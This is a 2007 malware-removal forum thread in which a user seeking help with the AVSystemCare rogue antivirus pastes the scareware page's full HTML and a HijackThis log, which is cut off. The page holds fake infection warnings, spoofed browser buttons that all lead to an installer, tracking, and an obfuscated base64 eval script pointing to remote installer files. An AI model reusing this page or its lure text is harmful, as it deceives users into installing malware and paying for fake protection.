John Posted June 27, 2007 ID:5804 Share Posted June 27, 2007 Can't seem to get rid of AVSytemCare. My PC is real sluggish, hopefully related. I've tried Norton AV and Windows Defender but nothing is detected. Followed Syantec's recommendations for deleting keys from my registry but I could not locate most of them. Also ran Reistry Mechanic but this did not seem to help.I'm new to this forum. sorry, not familiar with HijackThis Logs.John Link to post Share on other sites More sharing options...
Root Admin RubbeR DuckY Posted June 27, 2007 Root Admin ID:5805 Share Posted June 27, 2007 John, can you please follow all directions listed here. http://www.malwarebytes.org/forums/index.php?showtopic=1295. Then post your HijackThis log. Thanks! Link to post Share on other sites More sharing options...
John Posted June 28, 2007 Author ID:5810 Share Posted June 28, 2007 John, can you please follow all directions listed here. http://www.malwarebytes.org/forums/index.php?showtopic=1295. Then post your HijackThis log. Thanks!I ran RogueRemover, not sure why 2 of th 4 items were not removed.Malwarebytes' RogueRemoverMalwarebytes Link to post Share on other sites More sharing options...
Root Admin RubbeR DuckY Posted June 28, 2007 Root Admin ID:5811 Share Posted June 28, 2007 First, download the program Hoster to restore the default hosts file back onto your machine.To do so, download the Hoster program and run it. http://www.funkytoad.com/download/hoster.zipWhen it opens, click on the Restore Original Hosts button and then exit Hoster.Next, open HijackThis and place a checkmark next to the following items.O2 - BHO: (no name) - {CDEEC43D-3572-4E95-A2A5-F519D29F00C0} - (no file)O3 - Toolbar: (no name) - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - (no file)O3 - Toolbar: (no name) - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)Click Fix Checked. Next download one of our other utilties called StartUpLite from http://www.malwarebytes.org/startuplite.php. Start it and read each description. Select an option for each item and then click Continue. Restart your computer and let me know how your computer is running. Link to post Share on other sites More sharing options...
John Posted June 28, 2007 Author ID:5820 Share Posted June 28, 2007 First, download the program Hoster to restore the default hosts file back onto your machine.To do so, download the Hoster program and run it. http://www.funkytoad.com/download/hoster.zipWhen it opens, click on the Restore Original Hosts button and then exit Hoster.Next, open HijackThis and place a checkmark next to the following items.O2 - BHO: (no name) - {CDEEC43D-3572-4E95-A2A5-F519D29F00C0} - (no file)O3 - Toolbar: (no name) - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - (no file)O3 - Toolbar: (no name) - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)Click Fix Checked. Next download one of our other utilties called StartUpLite from http://www.malwarebytes.org/startuplite.php. Start it and read each description. Select an option for each item and then click Continue. Restart your computer and let me know how your computer is running.Went to funkytoad site. No hoster.zip file available. Downloaded HosterXpert and ran program. Got one error: cannot create file c:windows\system32\drivers\ETC\hostFollwed your instructions to run HijackThis and fix 3 items, then ra StartUpLite and restarted my computer.No noticeable difference in perfmormance, but more distressing is I wasn't on-line more than 3 minutes and AVSystemCare screen show up twice. Capturedthe following from the screen<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Download antivirus program</title><script language=VBScript>Private i, x, MM_FlashControlVersionOn Error Resume Nextx = nullMM_FlashControlVersion = 0var FlashmodeFlashMode = Falsevar do_dw_varvar browser_flash_versionFor i = 9 To 1 Step -1 Set x = CreateObject("ShockwaveFlash.ShockwaveFlash." & i) MM_FlashControlInstalled = IsObject(x) If MM_FlashControlInstalled Then MM_FlashControlVersion = CStr(i) Exit For End IfNextx = nullFlashMode = (MM_FlashControlVersion >= 6)do_dw_var = FlashModebrowser_flash_version = MM_FlashControlVersion</SCRIPT><script type="text/javascript" language="JavaScript">function detect(){FlashMode = 0;if (navigator.plugins && navigator.plugins.length > 0){ if (navigator.plugins["Shockwave Flash"]) { var plugin_version = 0; var words = navigator.plugins["Shockwave Flash"].description.split(" "); for (var i = 0; i < words.length; ++i) { if (isNaN(parseInt(words))) continue; plugin_version = words; } if (plugin_version >= 6) { var plugin = navigator.plugins["Shockwave Flash"]; var numTypes = plugin.length; for (j = 0; j < numTypes; j++) { mimetype = plugin[j]; if (mimetype) { if (mimetype.enabledPlugin && (mimetype.suffixes.indexOf("swf") != -1)) FlashMode = 1; // Mac wierdness if (navigator.mimeTypes["application/x-shockwave-flash"] == null) FlashMode = 0; } } } }}do_dw_var = FlashMode;browser_flash_version = plugin_version;}function showFlash() { if (navigator.appName.toLowerCase()!='microsoft internet explorer') { detect(); } if (navigator.userAgent.toLowerCase().indexOf('opera')>=0) { detect(); } if(do_dw_var) {document.writeln('<a style="display: block; position:absolute; left: 0px; top: 0px;" href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class="download_link" id="download_link"><img src="http://avsystemcare.com/data/img/en/spacer.gif" width="532" height="86" border="0"></a>');document.writeln('<div style="position:absolute; left: 0px; top:0px;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="532" height="86" id="g_banner" align="middle">');document.writeln('<param name="allowScriptAccess" value="sameDomain" />');document.writeln('<param name="wmode" value="transparent" />');document.writeln('<param name="movie" value="http://avsystemcare.com/data/img/en/i28a_Scan.swf" /><param name="quality" value="high" /><param name="bgcolor" value="#ffffff" /><PARAM NAME=FLASHVARS VALUE="CLICK_URL=/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c"/><embed FLASHVARS="CLICK_URL=/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" src="http://avsystemcare.com/data/img/en/i28a_Scan.swf" quality="high" wmode="transparent" bgcolor="#ffffff" width="532" height="86" name="g_banner" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object></div>');}}</script><style type="text/css">body {margin:0px 0px 0px 0px}a:link {text-decoration:none; color:#000000}a:visited {text-decoration:none; color:#000000}a:hover {text-decoration:none; color:#000000}a:active {text-decoration:none; color:#000000}#general {width:720px}#float {float:left}#clear {clear:both}#brds {border-left:3px solid #191fbc; border-right:3px solid #191fbc; border-bottom:3px solid #191fbc}#container {width:714px}#pad1 {padding-right:15px}#pad2 {padding-left:17px}#pad3 {padding-left:11px; padding-bottom:15px}#pad4 {padding-top:15px; padding-left:5px; padding-bottom:12px}#pad5 {padding-left:10px; padding-bottom:5px}#menu {background-color:#ece9d8}#btns {background-image:url(http://avsystemcare.com/data/img/en/i28a_bg2.gif)}#btns-bot {background-image:url(http://avsystemcare.com/data/img/en/i28a_bg3.gif); position:relative}#btn-link2 {position:absolute; width:81px; height:20px; top:9px; left:513px}#btn-link3 {position:absolute; width:81px; height:20px; top:9px; left:615px}#dv1 {float:left; width:456px}#dv2 {width:515px; padding-top:2px; padding-bottom:3px}.style1 {font-family:Arial; font-size:11px; color:#000000}.style2 {font-family:Arial; font-size:11px; color:#a7a292}.style3 {font-family:Arial; font-size:18px; color:#000000; font-weight:bold}.style4 {font-family:Arial; font-size:14px; color:#000000; font-weight:bold}.style4 strong {color:#FF0000}.style5 {font-family:Arial; font-size:12px; color:#000000; font-weight:bold}.style6 {font-family:Arial; font-size:10px; color:#000000}</style></head><body><div align="center"><div id="general" align="left"> <div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="25"><img src="http://avsystemcare.com/data/img/en/i28a_icon1.gif" width="25" height="30"></td> <td background="http://avsystemcare.com/data/img/en/i28a_bg1.gif"><img src="http://avsystemcare.com/data/img/en/i28a_t1.gif"></td> <td width="75" align="right"><img src="http://avsystemcare.com/data/img/en/i28a_icon2.gif" width="75" height="30"></td> </tr> </table> </div> <div id="brds"> <div id="container"> <div id="menu" align="left"> <table height="24" border="0" cellpadding="0" cellspacing="0" class="style1"> <tr> <td width="20"> </td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">File</a></td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Edit</a></td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">View</a></td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Favorites</a></td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Tools</a></td> <td id="pad1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Help</a></td> </tr> </table> </div> <div id="btns" align="left"> <table height="46" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="43"><img src="http://avsystemcare.com/data/img/en/i28a_btn1.gif" width="43" height="25"></td> <td class="style2">Back</td> <td width="60"><img src="http://avsystemcare.com/data/img/en/i28a_btn2.gif" width="60" height="25"></td> <td width="19"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_btn3.gif" width="19" height="25" border="0"></a></td> <td width="10"><img src="http://avsystemcare.com/data/img/en/i28a_line1.gif" width="10" height="46"></td> <td width="24"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_btn4.gif" width="24" height="25" hspace="4" border="0"></a></td> <td class="style1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Search</a></td> <td width="23"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_btn5.gif" width="23" height="25" hspace="5" border="0"></a></td> <td class="style1"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link">Folders</a></td> <td width="11"><img src="http://avsystemcare.com/data/img/en/i28a_line2.gif" width="11" height="46"></td> <td><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_btn6.gif" width="32" height="25" border="0"></a></td> </tr> </table> </div> <div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="137" align="center" valign="middle" bgcolor="#00094d"><img src="http://avsystemcare.com/data/img/en/i28a_icon3.gif" width="78" height="68"></td> <td valign="top" id="pad2"> <div> <div id="float"><img src="http://avsystemcare.com/data/img/en/i28a_icon4.gif" width="76" height="65"></div> <div id="dv1"> <div id="pad4"> <div class="style3">WARNING: Your computer may be infected</div> <div class="style4">Install a security solution to check and prevent infections.</div> </div> </div> <div id="clear"></div> </div> <div id="pad3"> <div class="style5">A reliable antivirus software is scanning your PC for viruses, spyware and other threats</div> <div class="style5">Protect your system and prevent the risk of infection</div> <div class="style5">This antivirus will now located viruses and infected files on your system</div> </div> <div style="position:relative"> <div class="fla_banner"> <a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_no_flash.gif" border="0"></a> <script>showFlash()</script> </div> </div> <div id="dv2" class="style6" align="right">Now Performing A Typical System Scan</div> </td> </tr> </table> </div> <div id="btns-bot"> <div id="btn-link2"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_spacer.gif" width="81" height="20" border="0"></a></div> <div id="btn-link3"><a href="/data/installer.php?52545a0d46475b50165400075d68434b6b510c6955515253105f5b585e52505613525556084049682055352010500010712050b000c" class='download_link' id="download_link"><img src="http://avsystemcare.com/data/img/en/i28a_spacer.gif" width="81" height="20" border="0"></a></div> <table width="100%" height="38" border="0" cellpadding="0" cellspacing="0"> <tr> <td valign="bottom" class="style6" id="pad5">Advertisement</td> <td width="81"> <table width="100%" height="20" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" background="http://avsystemcare.com/data/img/en/i28a_bg-btn1.gif" class="style2">< Back</td> </tr> </table> </td> <td width="8"> </td> <td width="81"> <table width="100%" height="20" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" background="http://avsystemcare.com/data/img/en/i28a_bg-btn2.gif" class="style1">Next ></td> </tr> </table> </td> <td width="21"> </td> <td width="81"> <table width="100%" height="20" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center" background="http://avsystemcare.com/data/img/en/i28a_bg-btn3.gif" class="style1">Cancel</td> </tr> </table> </td> <td width="17"> </td> </tr> </table> </div> </div> </div></div></div><script language="javascript" type="text/javascript" src="http://avsystemcare.com/data/js/autoresize.js"></script><img src="http://calc.avsystemcare.com/gsid_avsystemcare/gai_swbgreach_us_en_ged2/gli_422/gr_/lp_true/stats.php" width="1" height="1"><div id="cab1"></div><div id="cab"></div><script language='JavaScript'>var keyStr = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';function prepare(input) { var output = ''; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ''); do { enc1 = keyStr.indexOf(input.charAt(i++)); enc2 = keyStr.indexOf(input.charAt(i++)); enc3 = keyStr.indexOf(input.charAt(i++)); enc4 = keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; }eval(prepare('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'));</script><script language="JavaScript">var _PHRASES = new Array( 'OkClicked.phrase1', 'AVSystemCare will scan your system for viruses now.', 'OkClicked.phrase2', 'Please select "RUN" or "OPEN" when prompted to start the installation.', 'OkClicked.phrase3', 'This file has been digitally signed and independently certified as 100% free of viruses, adware and spyware.', 'OkUnloadHandler.phrase1', 'NOTICE: You have not completed the virus scan! If your computer is infected,', 'OkUnloadHandler.phrase2', 'you could suffer data loss, erratic PC behavior, PC freezes and crashes.', 'OkUnloadHandler.phrase3', 'Do you want to install AVSystemCare to scan your PC for malware now? (Recommended)', "order.msg1.1", "Warning - {err} severe malware have been detected on your PC.", "order.msg2.1", "Warning! Your PC can be in danger of severe viruses.", "order.msg2", "These viruses may cause permanent damage to your computer.", "order.msg3", "If you want to fix your system, please register your software, continue?");</script><script language='javascript' type='text/javascript' src='http://avsystemcare.com/data/js/managers.js'></script><script language="javascript" type="text/javascript" src="http://avsystemcare.com/data/js/index.js"></script></body></html> Link to post Share on other sites More sharing options...
therock247uk Posted June 28, 2007 ID:5825 Share Posted June 28, 2007 Can you please post a fresh Hijackthis log? Link to post Share on other sites More sharing options...
John Posted June 28, 2007 Author ID:5827 Share Posted June 28, 2007 Can you please post a fresh Hijackthis log?Here is my latest Hijackthis log.Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 2:13:57 PM, on 6/28/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\Program Files\Windows Defender\MsMpEng.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\system32\spoolsv.exeC:\PROGRA~1\COMMON~1\AOL\ACS\AOLacsd.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\WINDOWS\System32\cisvc.exeC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\wanmpsvc.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exeC:\PROGRA~1\COMMON~1\AOL\AOLSPY~1\AOLSP Scheduler.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Common Files\AOL\1154100068\ee\aolsoftware.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\iPod\bin\iPodService.exeC:\Program Files\Windows Defender\MSASCui.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\CA\eTrust PestPatrol\CAPPActiveProtection.exeC:\Program Files\CA\CA Internet Security Suite\ccprovsp.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Digital Line Detect\DLG.exeC:\Program Files\Norton AntiVirus\navapsvc.exeC:\Program Files\Internet Explorer\iexplore.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Microsoft Money\System\urlmap.exeC:\Program Files\Messenger\msmsgs.exeC:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exeR1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dellnet.com/R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 